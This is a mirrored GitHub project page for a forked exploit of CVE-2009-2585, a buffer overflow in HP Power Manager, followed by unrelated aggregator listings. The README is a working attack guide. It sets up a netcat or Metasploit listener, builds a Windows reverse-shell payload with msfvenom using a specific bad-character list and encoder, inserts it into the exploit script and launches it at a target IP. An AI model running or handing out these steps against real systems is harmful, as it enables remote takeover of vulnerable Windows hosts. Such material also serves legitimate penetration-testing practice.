Git Product home page Git Product logo

kastahl / cve2009-2585_hp_power_manager_bof Goto Github PK

View Code? Open in Web Editor NEW

This project forked from n4xh4ck5/cve2009-2585_hp_power_manager_bof

0.0 0.0 0.0 27 KB

It is a version modified of the original exploit by Muhammad Haidari (https://raw.githubusercontent.com/Muhammd/HP-Power-Manager/master/hpm_exploit.py). The modification includes a payload which allows to obtain a reverse shell to avoid to open ports in the Windows'target which the firewall's windows will be closed it.

License: GNU General Public License v3.0

Python 100.00%

cve2009-2585_hp_power_manager_bof's Introduction

CVE2009-2585_HP_Power_Manager_BoF

It is a version modified of the original exploit by Muhammad Haidari (https://raw.githubusercontent.com/Muhammd/HP-Power-Manager/master/hpm_exploit.py). The modification includes a payload which allows to obtain a reverse shell to avoid to open ports in the Windows'target which the firewall's windows will be closed it.

Usage

At firts, put a listener:

 sudo nc -lvp 443 

Or using the metasploit module:

 /exploit/multi/handler with payload: windows/shell_reverse_tcp 

Create the payload:

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443  EXITFUNC=thread -b '\x00\x1a\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5' x86/alpha_mixed --platform windows -f python

Add the payload to the exploit!

Now, you can launch the exploit:

python CVE2009-2585_HP_Power_Manager_BoF.py 10.10.10.10 

cve2009-2585_hp_power_manager_bof's People

Contributors

kastahl avatar n4xh4ck5 avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.